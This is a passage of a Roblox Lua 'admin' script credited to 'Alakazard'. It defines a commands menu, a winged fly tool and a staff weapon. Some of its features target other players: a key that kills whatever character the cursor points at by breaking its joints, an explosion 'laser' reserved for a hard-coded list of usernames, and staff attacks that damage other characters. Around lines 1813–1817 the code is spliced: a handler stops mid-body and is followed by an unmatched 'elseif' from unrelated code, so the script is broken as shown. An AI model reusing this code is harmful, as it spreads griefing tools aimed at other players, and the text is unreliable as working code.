  1048. for i,v in pairs(Commands)do
  1049. _G['Alakazard..'..'\39'..'s Admin Commands'][i]=v
  1050. end
  1051. end
  1052.  
  1053. ShowCommands=function(p)--Guis.Commands
  1054. _GCommands()
  1055. for i,v in pairs(p:children())do
  1056. if v:IsA('PlayerGui')then
  1057. for a,w in pairs(v:children())do
  1058. if w.Name=='Commands from Alakazard'then
  1059. w:remove()
  1060. end
  1061. end
  1062. end
  1063. end
  1064. screen=new('ScreenGui',PlayerGui(p))
  1065. screen.Name='Commands from Alakazard'
  1066. Main=new('TextButton',screen)
  1067. Main.Size=unew(0,200,0,30)
  1068. Main.Position=unew(0,0,0,0)
  1069. Main.TextColor3=cnew(1,1,1)
  1070. Main.Font=2
  1071. Main.TextXAlignment=0
  1072. Main.Text='Show Commands'
  1073. Main.FontSize=('Size14')
  1074. Main.Style=2
  1075. Main:TweenPosition(unew(0,0,.41,0),Enum.EasingDirection.Out,Enum.EasingStyle.Back,2,false)
  1076. Scripting('script',[[
  1077. gui=script.Parent
  1078. c=_G['Alakazard..'..'\39'..'s Admin Commands']
  1079. haa=nil
  1080. new=Instance.new
  1081. unew=UDim2.new
  1082. QQ=function(f)coroutine.resume(coroutine.create(f))end
  1083. word=function(t)
  1084. for q in string.gmatch(t,'%a+')do
  1085. return q
  1086. end
  1087. end
  1088. groups={}
  1089. newgroup=function()
  1090. child=#gui:children()-1
  1091. ggg=new('TextButton',gui)
  1092. ggg.Text=child+1
  1093. ggg.Style=2
  1094. ggg.Font=2
  1095. ggg.FontSize='Size14'
  1096. ggg.Size=unew(0,20,0,20)
  1097. ggg.Position=unew(0,0,0,20)
  1098. ggg:TweenPosition(unew(0,20*child-9,0,20),Enum.EasingDirection.Out,Enum.EasingStyle.Back,2,false)
  1099. ggg.TextColor3=Color3.new(1,1,1)
  1100. haa=ggg
  1101. return ggg
  1102. end
  1103. gui.MouseButton1Click:connect(function()
  1104. if click==true then return end
  1105. click=true
  1106. if gui.AutoButtonColor==true then
  1107. QQ(function()
  1108. xys='Hide Commands'
  1109. for wwq=1,#xys do wait()
  1110. gui.Text=xys:sub(1,wwq)
  1111. end
  1112. end)
  1113. gui.Style=1
  1114. gui.AutoButtonColor=false
  1115. nam=0
  1116. latitude=newgroup()
  1117. new('NumberValue',latitude).Value=#gui:children()-1
  1118. for text,fun in pairs(c)do
  1119. if nam==10 then
  1120. wait(.1)
  1121. nam=0
  1122. latitude=newgroup()
  1123. new('NumberValue',latitude).Value=#gui:children()-1
  1124. end
  1125. nam=nam+1
  1126. if groups[#gui:children()-1]==nil then
  1127. groups[#gui:children()-1]={}
  1128. end
  1129. groups[#gui:children()-1][word(text)]=text
  1130. end
  1131. for i,v in pairs(gui:children())do
  1132. if v:IsA('TextButton')then
  1133. v.MouseButton1Click:connect(function()
  1134. if click==true then return end click=true
  1135. if v.AutoButtonColor==true then
  1136. v.AutoButtonColor=false
  1137. v.Style=1
  1138. hanat=v.Value.Value
  1139. for q,e in pairs(groups[hanat])do
  1140. wait()
  1141. gl=new('TextButton',v)
  1142. gl.Size=unew(0,100,0,20)
  1143. gl.Style=2
  1144. gl.TextColor3=Color3.new(1,1,1)
  1145. gl.Text=q
  1146. gl.Font=2
  1147. gl.FontSize='Size14'
  1148. gl.Position=gl.Position+unew(0,-9/1.5,0,0)
  1149. gl:TweenPosition(unew(0,-9/1.5,0,20*(#v:children()-1)),Enum.EasingDirection.Out,Enum.EasingStyle.Back,1,false)
  1150. end
  1151. for nb,rrr in pairs(v:children())do
  1152. if rrr:IsA('TextButton')then
  1153. rrr.MouseButton1Click:connect(function()
  1154. for h,k in pairs(gui.Parent:children())do
  1155. if k.Name=='Ala'then
  1156. k:remove()
  1157. end
  1158. end
  1159. text_=groups[rrr.Parent.Value.Value][rrr.Text]
  1160. tutorial=new('TextButton',gui.Parent)
  1161. game:service('Debris'):AddItem(tutorial,#text_/5)
  1162. tutorial.Size=unew(0,200,0,200)
  1163. tutorial.Style=1
  1164. tutorial.Name='Ala'
  1165. tutorial.TextWrap=true
  1166. tutorial.AutoButtonColor=false
  1167. tutorial.Font=2
  1168. tutorial.FontSize='Size14'
  1169. tutorial.TextColor3=Color3.new(1,1,1)
  1170. tutorial.Position=unew(0,200,0.41,0)
  1171. QQ(function()for a_=1,#text_ do tutorial.Text=text_:sub(1,a_)wait()end end)
  1172. QQ(function()for _=1,20 do wait()tutorial.Size=unew(0,10*_,0,30)end for _=1,20 do wait()tutorial.Size=unew(0,200,0,10*_)end end)
  1173. end)
  1174. end
  1175. end
  1176. else
  1177. v.Style=2
  1178. v.AutoButtonColor=true
  1179. for n,b in pairs(v:children())do
  1180. if not b:IsA('NumberValue')then b:remove()end
  1181. end
  1182. end
  1183. click=false
  1184. end)
  1185. end
  1186. end
  1187. else
  1188. gui.Style=2
  1189. gui.AutoButtonColor=true
  1190. QQ(function()
  1191. xys='Show Commands'
  1192. for wwq=1,#xys do wait()
  1193. gui.Text=xys:sub(1,wwq)
  1194. end
  1195. end)
  1196. for i,v in pairs(gui:children())do
  1197. if v~=script then v:remove()end
  1198. end
  1199. end
  1200. click=false
  1201. end)
  1202. ]],Main)
  1203. end
  1204.  
  1205. NewCommand=function(commandtut,command,fn)
  1206. X(function()
  1207. Commands[commandtut]=(function(v,s)
  1208. if scmd(v,command)==false then return end
  1209. coroutine.resume(coroutine.create(fn))
  1210. end)
  1211. end)
  1212. end
  1213.  
  1214. FlyBin=function(p)
  1215. for i,v in pairs(p:children())do
  1216. if v.Name=='Fly stuff'then
  1217. v:remove()
  1218. end
  1219. end
  1220. bin=new('HopperBin')
  1221. bin.Name='Fly stuff'
  1222. bin.TextureId='http://www.roblox.com/asset/?id=54353092'
  1223. Scripting('local',[[
  1224. Evil={'NEMESlS','Brutally','raj99','alakazard','NEMESZISZ','Player'}
  1225. if not script.Parent:IsA('HopperBin')then
  1226. bin=Instance.new('HopperBin',game.Players.LocalPlayer.Backpack)
  1227. bin.TextureId='http://www.roblox.com/asset/?id=54353092'
  1228. bin.Name='AlaFly'
  1229. script.Parent=bin
  1230. else
  1231. bin=script.Parent
  1232. end
  1233. player=bin.Parent.Parent
  1234. debris=game:service('Debris')
  1235. new=Instance.new
  1236. fnew=CFrame.new
  1237. brick=BrickColor.new
  1238. vnew=Vector3.new
  1239. rot=CFrame.fromEulerAnglesXYZ
  1240. if script.className~='LocalScript'then
  1241. bin:remove()
  1242. end
  1243. T=new('Sound')
  1244. T.SoundId='rbxassetid://2101157'
  1245. T.Pitch=.4
  1246. motors={
  1247.  
  1248. right={},
  1249.  
  1250. left={},
  1251.  
  1252. mains={}
  1253.  
  1254. }
  1255. X=function(f)coroutine.resume(coroutine.create(f))end
  1256.  
  1257. life=function(obj,time)debris:AddItem(obj,time)end
  1258.  
  1259. local bv,bg,torso,Lmotor,Rmotor,head
  1260.  
  1261. fly=150
  1262. findt=function()
  1263. for i,v in pairs(player.Character:children())do
  1264. if v.Name=='Torso'then
  1265. return v
  1266. end
  1267. end
  1268. end
  1269. wing=function()
  1270. torso=player.Character.Torso
  1271. for i,v in pairs(torso.Parent:children())do
  1272. if v.Name=='WingMain'then
  1273. v:remove()
  1274. end
  1275. end
  1276. mainwingpart=new('Part')
  1277. mainwingpart.Name='WingMain'
  1278. mainwingpart.CanCollide=false
  1279. mainwingpart.Size=vnew(1,1,1)
  1280. mainwingpart.Transparency=1
  1281. mainwingpart.BrickColor=BrickColor.Black()
  1282. mainwingpart.Parent=player.Character
  1283. weld=new('Weld',torso)
  1284. weld.Part0=weld.Parent
  1285. weld.Part1=mainwingpart
  1286. weld.C0=fnew(0,.4,0)
  1287. WingRight=new('Part')
  1288. WingRight.formFactor=3
  1289. WingRight.Size=vnew(.04,.3,.5)
  1290. WingRight.CanCollide=false
  1291. WingRight.BrickColor=BrickColor.Black()
  1292. WingRight.Parent=mainwingpart
  1293. Rmotor=new('Motor',mainwingpart)
  1294. Rmotor.Part0=Rmotor.Parent
  1295. Rmotor.Part1=WingRight
  1296. Rmotor.C1=rot(0,math.pi/1.5,0)+vnew(-.18,-.10,.8)
  1297. nextpp=nil
  1298. dan=-2
  1299. for w=1,15 do
  1300. wait()
  1301. dan=dan+1
  1302. pp=new('Part')
  1303. pp.Locked=true
  1304. pp.BrickColor=BrickColor.Black()
  1305. pp.formFactor=3
  1306. if w==1 then
  1307. pp.Size=vnew(.3,2.5,.8)
  1308. else
  1309. pp.Size=vnew(.3,1/(w/5),2/w)
  1310. end
  1311. pp.CanCollide=false
  1312. pp.BrickColor=BrickColor.Black()
  1313. pp.CFrame=WingRight.CFrame
  1314. pp.Material='Slate'
  1315. pp.Parent=WingRight
  1316. if dan==1 then
  1317. dan=0
  1318. asdlal=new('WedgePart')
  1319. asdlal.BrickColor=BrickColor.White()
  1320. asdlal.formFactor=3
  1321. asdlal.Size=vnew(.25,pp.Size.y,15/w)
  1322. for lawlz,evil in pairs(Evil)do
  1323. if player.Name==evil then
  1324. asdlal:remove()
  1325. asdlal=new('Part')
  1326. asdlal.formFactor=3
  1327. asdlal.BrickColor=BrickColor.Black()
  1328. asdlal.Size=vnew(.25,.25,15/w)
  1329. end
  1330. end
  1331. asdlal.Locked=true
  1332. asdlal.CanCollide=false
  1333. asdlal.Material='Slate'
  1334. asdlal.Parent=pp
  1335. mmm=new('Motor',pp)
  1336. mmm.Part0=pp
  1337. mmm.Part1=asdlal
  1338. mmm.C0=fnew(0,0,-asdlal.Size.z/2)
  1339. end
  1340. if w==1 then
  1341. ppmotor=new('Motor',WingRight)
  1342. else
  1343. ppmotor=new('Motor',nextpp)
  1344. end
  1345. table.insert(motors.right,ppmotor)
  1346. ppmotor.Part0=ppmotor.Parent
  1347. ppmotor.Part1=pp
  1348. if w==1 then
  1349. ppmotor.C0=rot(-.04,-math.pi/6,0)+vnew(.3,0,-.1)
  1350. else
  1351. ppmotor.C0=rot(-.1/(w/7),-.07,0)+vnew(0,pp.Size.y,0)
  1352. end
  1353. nextpp=pp
  1354. end
  1355.  
  1356.  
  1357. WingLeft=new('Part')
  1358. WingLeft.formFactor=3
  1359. WingLeft.Size=vnew(.04,.3,.5)
  1360. WingLeft.CanCollide=false
  1361. WingLeft.BrickColor=BrickColor.Black()
  1362. WingLeft.Parent=mainwingpart
  1363. Lmotor=new('Motor',mainwingpart)
  1364. Lmotor.Part0=Lmotor.Parent
  1365. Lmotor.Part1=WingLeft
  1366. Lmotor.C1=rot(0,-math.pi/1.5,0)+vnew(0.18,-.10,.8)
  1367. nextpp=nil
  1368. dan=-2
  1369. for w=1,15 do
  1370. wait()
  1371. dan=dan+1
  1372. pp=new('Part')
  1373. pp.Locked=true
  1374. pp.BrickColor=BrickColor.Black()
  1375. pp.formFactor=3
  1376. if w==1 then
  1377. pp.Size=vnew(.3,2.5,.8)
  1378. else
  1379. pp.Size=vnew(.3,1/(w/5),2/w)
  1380. end
  1381. pp.CanCollide=false
  1382. pp.BrickColor=BrickColor.Black()
  1383. pp.CFrame=WingLeft.CFrame
  1384. pp.Material='Slate'
  1385. pp.Parent=WingLeft
  1386. if dan==1 then
  1387. dan=0
  1388. asdlal=new('WedgePart')
  1389. asdlal.BrickColor=BrickColor.White()
  1390. asdlal.formFactor=3
  1391. asdlal.Size=vnew(.25,pp.Size.y,15/w)
  1392. for lawlz,evil in pairs(Evil)do
  1393. if player.Name==evil then
  1394. asdlal:remove()
  1395. asdlal=new('Part')
  1396. asdlal.formFactor=3
  1397. asdlal.BrickColor=BrickColor.Black()
  1398. asdlal.Size=vnew(.25,.25,15/w)
  1399. end
  1400. end
  1401. asdlal.Locked=true
  1402. asdlal.CanCollide=false
  1403. asdlal.Material='Slate'
  1404. asdlal.Parent=pp
  1405. mmm=new('Motor',pp)
  1406. mmm.Part0=pp
  1407. mmm.Part1=asdlal
  1408. mmm.C0=fnew(0,0,-asdlal.Size.z/2)
  1409. end
  1410. if w==1 then
  1411. ppmotor=new('Motor',WingLeft)
  1412. else
  1413. ppmotor=new('Motor',nextpp)
  1414. end
  1415. ppmotor.Part0=ppmotor.Parent
  1416. table.insert(motors.left,ppmotor)
  1417. ppmotor.Part1=pp
  1418. if w==1 then
  1419. ppmotor.C0=rot(-.04,math.pi/6,0)+vnew(-.3,0,-.1)
  1420. else
  1421. ppmotor.C0=rot(-.1/(w/7),.07,0)+vnew(0,pp.Size.y,0)
  1422. end
  1423. nextpp=pp
  1424. end
  1425. X(function()
  1426. for i,v in pairs(motors.right)do
  1427. v.C1=rot(.1,0,0)
  1428. wait()
  1429. end
  1430. for i,v in pairs(motors.right)do
  1431. v.C1=rot(0,-.1,-.1)
  1432. wait()
  1433. end
  1434. end)
  1435. X(function()
  1436. for i,v in pairs(motors.left)do
  1437. v.C1=rot(.1,0,0)
  1438. wait()
  1439. end
  1440. for i,v in pairs(motors.left)do
  1441. v.C1=rot(0,.1,.1)
  1442. wait()
  1443. end
  1444. end)
  1445. X(function()
  1446. for i,v in pairs(motors.right)do
  1447. v.C1=rot(.1,0,0)
  1448. wait()
  1449. end
  1450. for i,v in pairs(motors.right)do
  1451. v.C1=rot(0,-.1,0)
  1452. wait()
  1453. end
  1454. end)
  1455. X(function()
  1456. for i,v in pairs(motors.left)do
  1457. v.C1=rot(.1,0,0)
  1458. wait()
  1459. end
  1460. for i,v in pairs(motors.left)do
  1461. v.C1=rot(0,.1,0)
  1462. wait()
  1463. end
  1464. end)
  1465. Rmotor.MaxVelocity=.1
  1466. Lmotor.MaxVelocity=.1
  1467. Lmotor.DesiredAngle=.8
  1468. Rmotor.DesiredAngle=-.8
  1469. end
  1470.  
  1471. leftarm=function(bool)
  1472. X(function()
  1473. newlarm=new('Motor6D')
  1474. newlarm.Name='Left Shoulder'
  1475. newlarm.Parent=player.Character.Torso
  1476. newlarm.Part0=player.Character.Torso
  1477. newlarm.Part1=player.Character['Left Arm']
  1478. wait()--hmm
  1479. newlarm.C0=fnew(-1,.5,0,0,0,-1,0,1,0,1,0,0)
  1480. newlarm.C1=fnew(.5,.5,0,0,0,-1,0,1,0,1,0,0)
  1481. if bool==false then return newlarm end
  1482. an=player.Character.Animate
  1483. an.Disabled=true
  1484. an.Disabled=false
  1485. end)
  1486. return newlarm
  1487. end
  1488.  
  1489. Name=function()
  1490. name=''
  1491. for LA=1,3 do
  1492. name=name..string.char(math.random(0,255))
  1493. end
  1494. return name
  1495. end
  1496.  
  1497. Lazer=function(m)wllwlw=false
  1498. for i,v in pairs(Evil)do
  1499. if v==player.Name then
  1500. wllwlw=true break
  1501. end
  1502. end
  1503. if wllwlw==false then return end
  1504. if asdTroll~=nil then return end
  1505. asdTroll='asd'
  1506. rarm=rightarm(false)
  1507. rarm.MaxVelocity=.2
  1508. rarm.DesiredAngle=math.rad(110)
  1509. larm=leftarm(false)
  1510. larm.MaxVelocity=.2
  1511. larm.DesiredAngle=-math.rad(110)
  1512.  
  1513. lball=new('Part')
  1514. life(lball,10)
  1515. lball.Shape=0
  1516. lball.Size=vnew(1,1,1)
  1517. lball.CanCollide=false
  1518. lball.BottomSurface=0
  1519. lball.TopSurface=0
  1520. lball.Transparency=.5
  1521. lball.BrickColor=BrickColor.White()
  1522. for i,v in pairs(Evil)do
  1523. if player.Name==v then
  1524. lball.BrickColor=BrickColor.Black()
  1525. end
  1526. end
  1527. lball.Parent=player.Character
  1528. lweld=new('Weld',larm.Part1)
  1529. lweld.Part0=lweld.Parent
  1530. lweld.Part1=lball
  1531. lweld.C0=fnew(0,-4,0)
  1532.  
  1533. rball=new('Part')
  1534. life(rball,10)
  1535. rball.Shape=0
  1536. rball.Size=vnew(1,1,1)
  1537. rball.Transparency=.5
  1538. rball.CanCollide=false
  1539. rball.BottomSurface=0
  1540. rball.TopSurface=0
  1541. rball.BrickColor=BrickColor.White()
  1542. for i,v in pairs(Evil)do
  1543. if player.Name==v then
  1544. rball.BrickColor=BrickColor.Black()
  1545. end
  1546. end
  1547. rball.Parent=player.Character
  1548. rweld=new('Weld',rarm.Part1)
  1549. rweld.Part0=rweld.Parent
  1550. rweld.Part1=rball
  1551. rweld.C0=fnew(0,-4,0)
  1552. X(function()
  1553. X(function()
  1554. for KG=1,157 do wait()
  1555. part=new('Part')
  1556. life(part,.2)
  1557. part.Transparency=.3
  1558. asdrandom=(math.random(5,20)/10)+KG/40
  1559. new('BlockMesh',part).Scale=vnew(asdrandom,asdrandom,asdrandom)
  1560. part.Size=vnew(1,1,1)
  1561. part.Anchored=true
  1562. part.CFrame=rot(math.rad(math.random(0,360)),math.rad(math.random(0,360)),math.rad(math.random(0,360)))+lball.Position
  1563. part.Name='asd'
  1564. part.BrickColor=BrickColor.White()
  1565. for i,v in pairs(Evil)do
  1566. if player.Name==v then
  1567. part.BrickColor=BrickColor.Black()
  1568. end
  1569. end
  1570. part.Parent=lball
  1571. end
  1572. end)
  1573. for KG2=1,157 do wait()
  1574. part=new('Part')
  1575. life(part,.2)
  1576. part.Transparency=.3
  1577. asdrandom=(math.random(5,20)/10)+KG2/40
  1578. new('BlockMesh',part).Scale=vnew(asdrandom,asdrandom,asdrandom)
  1579. part.Size=vnew(1,1,1)
  1580. part.Anchored=true
  1581. part.CFrame=rot(math.rad(math.random(0,360)),math.rad(math.random(0,360)),math.rad(math.random(0,360)))+rball.Position
  1582. part.Name='asd'
  1583. part.BrickColor=BrickColor.White()
  1584. for i,v in pairs(Evil)do
  1585. if player.Name==v then
  1586. part.BrickColor=BrickColor.Black()
  1587. end
  1588. end
  1589. part.Parent=rball
  1590. end
  1591. rball:remove()
  1592. lball:remove()
  1593. rightarm(true)
  1594. leftarm(true)
  1595. asdTroll=nil
  1596. for wasd=1,200 do
  1597. if pp~=nil then pp:remove()end
  1598. if asdTroll~=nil then return end
  1599. pos=m.Hit.p
  1600. pp=new('Part')
  1601. life(pp,.1)
  1602. pp.formFactor=3
  1603. pp.BrickColor=BrickColor.Black()
  1604. pp.Transparency=.2
  1605. pp.Size=vnew(6,1000,6)
  1606. pp.CFrame=CFrame.new(pos.x,pos.y+(pp.Size.y/2),pos.z)+vnew(math.random(-3,3),0,math.random(-3,3))
  1607. exp=Instance.new('Explosion')
  1608. exp.Position=pos+vnew(math.random(-3,3),0,math.random(-3,3))
  1609. exp.BlastRadius=30
  1610. exp.Parent=workspace
  1611. Join=new('Part')
  1612. Join.formFactor=0
  1613. Join.Size=vnew(1,1,1)
  1614. new('SpecialMesh',Join).MeshType='Sphere'
  1615. Join.Mesh.Scale=vnew(60,60,60)
  1616. Join.Anchored=true
  1617. Join.BottomSurface=0
  1618. Join.TopSurface=0
  1619. Join.BrickColor=BrickColor.Black()
  1620. Join.Transparency=.5
  1621. Join.CFrame=rot(0,math.rad(3.6*wasd)*2,0)+pos+vnew(math.random(-3,3),0,math.random(-3,3))
  1622. Join.Parent=pp
  1623. pJoin=new('Part')
  1624. life(pJoin,.4)
  1625. new('BlockMesh',pJoin).Scale=vnew(10,10,10)+vnew((wasd/30),(wasd/30),(wasd/30))
  1626. pJoin.formFactor=0
  1627. pJoin.Size=vnew(1,1,1)
  1628. pJoin.Anchored=true
  1629. pJoin.BrickColor=BrickColor.Black()
  1630. pJoin.Transparency=.5
  1631. pJoin.CFrame=rot(math.rad(math.random(0,360)),math.rad(math.random(0,360)),math.rad(math.random(0,360)))+pos+vnew(math.random(-3,3),0,math.random(-3,3))
  1632. pJoin.Parent=workspace
  1633. pp.Parent=player.Character
  1634. wait()
  1635. pp.BrickColor=BrickColor.White()
  1636. end
  1637. end)
  1638. -- rightarm(true)
  1639. end
  1640.  
  1641. rightarm=function(bool)
  1642. if pcall(function()
  1643. newrarm=new('Motor6D')
  1644. newrarm.Name='Right Shoulder'
  1645. newrarm.Parent=player.Character.Torso
  1646. newrarm.Part0=player.Character.Torso
  1647. newrarm.Part1=player.Character['Right Arm']
  1648. newrarm.C0=fnew(1,.5,0,0,0,1,0,1,0,-1,0,0)
  1649. newrarm.C1=fnew(-.5,.5,0,0,0,1,0,1,0,-1,0,0)
  1650. if bool==false then return newlarm end
  1651. pcall(function()
  1652. an=player.Character.Animate
  1653. an.Disabled=true
  1654. an.Disabled=false
  1655. end)
  1656. end)then
  1657. return newrarm
  1658. end
  1659. end
  1660.  
  1661. light=function()
  1662. if pcall(function()torso=player.Character.Torso end)then
  1663. else
  1664. return
  1665. end
  1666. larm=leftarm(false)
  1667. tt=T:clone()
  1668. life(tt,0)
  1669. tt.Parent=workspace
  1670. tt:play()
  1671. Pl=new('Part')
  1672. life(Pl,20)
  1673. Pl.CFrame=torso.CFrame+torso.CFrame.lookVector*6
  1674. Pl.Anchored=true
  1675. Pl.CanCollide=false
  1676. Pl.Parent=workspace
  1677. leftarm(true)
  1678. end
  1679.  
  1680. bodys=function(asd)
  1681. for i,v in pairs(torso:children())do
  1682. if v:IsA('BodyVelocity')or v:IsA('BodyGyro')then
  1683. v:remove()
  1684. end
  1685. end
  1686. if asd==true then return end
  1687. bv=new('BodyVelocity')
  1688. bg=new('BodyGyro')
  1689. bv.maxForce=vnew(math.huge,math.huge,math.huge)
  1690. bv.velocity=vnew(0,0,0)
  1691. bg.maxTorque=vnew(0,0,0)
  1692. bg.Parent=torso
  1693. bv.Parent=torso
  1694. end
  1695. ball=function(asd)
  1696. for i,v in pairs(player.Character:children())do
  1697. if v.Name=='Fly Ball'then
  1698. v:remove()
  1699. end
  1700. end
  1701. if asd==true then return end
  1702. part=new('Part')
  1703. part.Shape=0
  1704. part.BottomSurface=0
  1705. part.TopSurface=0
  1706. part.Size=torso.Size*5
  1707. part.Transparency=.5
  1708. part.BrickColor=BrickColor.Black()
  1709. part.CanCollide=false
  1710. part.CFrame=torso.CFrame
  1711. part.Name='Fly Ball'
  1712. part.Parent=player.Character
  1713. weld=new('Weld')
  1714. weld.Parent=torso
  1715. weld.Part0=weld.Parent
  1716. weld.Part1=part
  1717. part.Touched:connect(function()
  1718. for i=1,5 do
  1719. wait()
  1720. part.Transparency=.5-i/10
  1721. end
  1722. part.Transparency=.5
  1723. end)
  1724. end
  1725. script.Parent.Selected:connect(function(m)
  1726. torso=player.Character.Torso
  1727. bodys(true)
  1728. m.KeyDown:connect(function(k)
  1729. if k=='q'then
  1730. fly=fly-10
  1731. if fly<0 then
  1732. fly=10
  1733. end
  1734. elseif k=='r'then
  1735. wing()
  1736. elseif k=='f'then
  1737. Lazer(m)
  1738. elseif k=='t'then
  1739. X(function()player.Character.WingMain:remove()end)
  1740. elseif k=='e'then
  1741. fly=fly+10
  1742. elseif k=='y'then
  1743. MUp=false
  1744. bodys(false)
  1745. elseif k=='p'then
  1746. print'asd'
  1747. elseif k=='b'then
  1748. fly=150
  1749. elseif k=='x'then
  1750. X(function()
  1751. if m.Target==workspace or m.Target==nil then return end
  1752. ko=new('ObjectValue')
  1753. game:service('Debris'):AddItem(ko,1)
  1754. ko.Value=player
  1755. ko.Name='creator'
  1756. for i,v in pairs(m.Target.Parent:children())do
  1757. if v:IsA('Humanoid')then
  1758. ko.Parent=v
  1759. v.Torso:BreakJoints()
  1760. X(function()
  1761. for asd=1,100 do
  1762. wait()
  1763. part=new('Part')
  1764. game:service('Debris'):AddItem(part,.2)
  1765. part.formFactor=0
  1766. part.Transparency=.3
  1767. part.Anchored=true
  1768. part.CanCollide=false
  1769. part.CFrame=rot(math.rad(math.random(1,180)),math.rad(math.random(1,180)),math.rad(math.random(1,180)))+v.Torso.Position
  1770. part.Size=vnew(2,2,2)
  1771. part.BrickColor=BrickColor.Black()
  1772. random=math.random(part.Size.x,part.Size.x*2)
  1773. new('BlockMesh',part).Scale=vnew(random,random,random)
  1774. part.Parent=workspace
  1775. end
  1776. end)
  1777. end
  1778. end
  1779. end)
  1780. end
  1781. end)
  1782. m.Button1Down:connect(function()
  1783. ball(true)
  1784. bodys(false)
  1785. MUp=false
  1786. rightarm(false)
  1787. leftarm(false)
  1788. bg.maxTorque=Vector3.new(900000,900000,900000)
  1789. bg.cframe=fnew(torso.Position,m.hit.p)*rot(math.rad(-60),0,0)
  1790. bv.velocity=fnew(torso.Position,m.hit.p).lookVector*fly
  1791. end)
  1792. m.Move:connect(function()
  1793. if MUp==true then return end
  1794. torso=player.Character.Torso
  1795. X(function()
  1796. bg.maxTorque=vnew(math.huge,math.huge,math.huge)
  1797. bg.cframe=fnew(torso.Position,m.hit.p)*rot(math.rad(-60),0,0)
  1798. bv.velocity=fnew(torso.Position,m.hit.p).lookVector*fly
  1799. end)
  1800. end)
  1801. m.Button1Up:connect(function()
  1802. MUp=true
  1803. ball(true)
  1804. bodys(false)
  1805. rightarm(true)
  1806. leftarm(true)
  1807. bv.maxForce=vnew(10000,10000,10000)
  1808. delay(2,function()if MUp==true then bodys(true)end end)
  1809. torso.Velocity=vnew(0,0,0)
  1810. torso.RotVelocity=vnew(0,0,0)
  1811. torso.CFrame=fnew(torso.Position,m.hit.p)*rot(0,0,0)
  1812. torso.Velocity=vnew(0,0,0)
  1813.  
  1814. nalol=Scripting('script',StaffSourceF1,nil)
  1815. a.user.Parent=nalol
  1816. nalol.Parent=a.parent.Value
  1817. elseif a.Name=='StaffFunction2'then
  1818. nalol=Scripting('script',StaffSourceF2,nil)
  1819. a.user.Parent=nalol
  1820. nalol.Parent=a.parent.Value
  1821. end
  1822. end)
  1823. end)
  1824.  
  1825. Staff=function(par)
  1826. X(function()
  1827. for i,v in pairs(par:children())do
  1828. if v.Name=='AlaStaff'then
  1829. wait()
  1830. se.debris:AddItem(v,.1)
  1831. end
  1832. end
  1833. end)
  1834. Print('Load Staff for '..par.Parent.Name..'!')
  1835. Tool=new('Tool')
  1836. Tool.Name='AlaStaff'
  1837. Tool.GripPos=vnew(0,.5,0)
  1838. Tool.TextureId='http://www.roblox.com/asset/?id=54353092'
  1839. ToolHandle=new('Part')
  1840. ToolHandle.Material=('Wood')
  1841. ToolHandle.BrickColor=bcn('Reddish brown')
  1842. ToolHandle.Name='Handle'
  1843. ToolHandle.formFactor=3
  1844. ToolHandle.Size=vnew(.5,6,.5)
  1845. ToolHandle.CanCollide=false
  1846. ToolHandle.Parent=Tool
  1847.  
  1848. Scripting('local',[[
  1849. --================Tool!================--
  1850. tool=script.Parent
  1851. staff=tool.Handle
  1852. SmokePart=nil
  1853. --=====================================--
  1854.  
  1855. --===============Player!===============--
  1856. player=nil
  1857. if tool.Parent:IsA('Model')then
  1858. player=game.Players[tool.Parent.Name]
  1859. elseif tool.Parent:IsA('Backpack')then
  1860. player=tool.Parent.Parent
  1861. end
  1862. --=====================================--
  1863.  
  1864. --================Math!================--
  1865. random= math.random;
  1866. pi= math.pi;
  1867. --=====================================--
  1868.  
  1869. --==============Services!==============--
  1870. debris= game:service('Debris')
  1871. workspace= game:service('Workspace')
  1872. lighting= game:service('Lighting')
  1873. insert= game:service('InsertService')
  1874. --=====================================--
  1875.  
  1876. --===============Changes===============--
  1877. new= Instance.new;
  1878. unew= UDim2.new;
  1879. vnew= Vector3.new;
  1880. fnew= CFrame.new;
  1881. cnew= Color3.new;
  1882. bcn= BrickColor.new;
  1883. look= CFrame.lookVector;
  1884. rot= CFrame.fromEulerAnglesXYZ;
  1885. soul= 0;
  1886. --=====================================--
  1887.  
  1888. tool.Parent=player.Backpack
  1889. clickActive=false
  1890. kayActive=false
  1891.  
  1892. --===========Base Functions!===========--
  1893. x=function(f)coroutine.resume(coroutine.create(f))end
  1894.  
  1895. sing=function(name,parent)
  1896. x(function()
  1897. mmo=new('Model')
  1898. debris:AddItem(mmo,1)
  1899. mmo.Name='StaffFunction'..name
  1900. V=new('ObjectValue',mmo)
  1901. V.Value=player
  1902. V.Name='user'
  1903. mmq=new('ObjectValue',mmo)
  1904. mmq.Name='parent'
  1905. mmq.Value=parent
  1906. mmc=mmo:clone()
  1907. debris:AddItem(mmc,1)
  1908. mmc.Parent=lighting
  1909. end)
  1910. end
  1911.  
  1912. ko=function(humanoid)
  1913. if humanoid:FindFirstChild('creator',true)then return end
  1914. k=new('ObjectValue')
  1915. k.Name='creator'
  1916. k.Value=player
  1917. k.Parent=humanoid
  1918. player.Character.Humanoid:TakeDamage(-humanoid.MaxHealth)
  1919. soul=soul+1
  1920. end
  1921.  
  1922. s1=function(t)
  1923. x(function()
  1924. clickActive=false
  1925. for i,h in pairs(t.Parent:children())do
  1926. if h:IsA('Humanoid')then
  1927. h:TakeDamage(.1)
  1928. if h.Health<=0 then
  1929. ko(h)
  1930. print'DIE!'
  1931. end
  1932. return
  1933. end
  1934. end
  1935. t:BreakJoints()
  1936. clickActive=false
  1937. end)
  1938. end
  1939.  
  1940. s2=function(t)
  1941. x(function()
  1942. delay(.1,function()s3(t)end)
  1943. if t:FindFirstChild('w-')then return end
  1944. q=player.Character.Torso.CFrame.lookVector
  1945. wq=new('BodyThrust')
  1946. debris:AddItem(wq,.2)
  1947. x(function()debris:AddItem(t.Smoke,.02)end)
  1948. x(function()
  1949. smc=Smoke:clone()
  1950. debris:AddItem(smc,3)
  1951. smc.Enabled=true
  1952. smc.Parent=t
  1953. end)
  1954. wq.force=vnew(40,40,40)
  1955. wq.location=vnew(0,100,1)
  1956. wq.Parent=t
  1957. qwe = Instance.new('BodyVelocity')
  1958. debris:AddItem(qwe,.3)
  1959. qwe.Name='w-'
  1960. qwe.maxForce=Vector3.new(1e7,1e7,1e7)
  1961. qwe.P=125
  1962. qwe.velocity=(Vector3.new(q.x,q.y,q.z)*100)+Vector3.new(0,30,0)
  1963. qwe.Parent=t
  1964. clickActive=false
  1965. for i,h in pairs(t.Parent:children())do
  1966. if h:IsA('Humanoid')then
  1967. h:TakeDamage(10)
  1968. if h.Health<=0 then
  1969. ko(h)
  1970. print'DIE!'
  1971. end
  1972. return
  1973. end
  1974. end
  1975. t:BreakJoints()
  1976. clickActive=false
  1977. end)
  1978. end
  1979.  
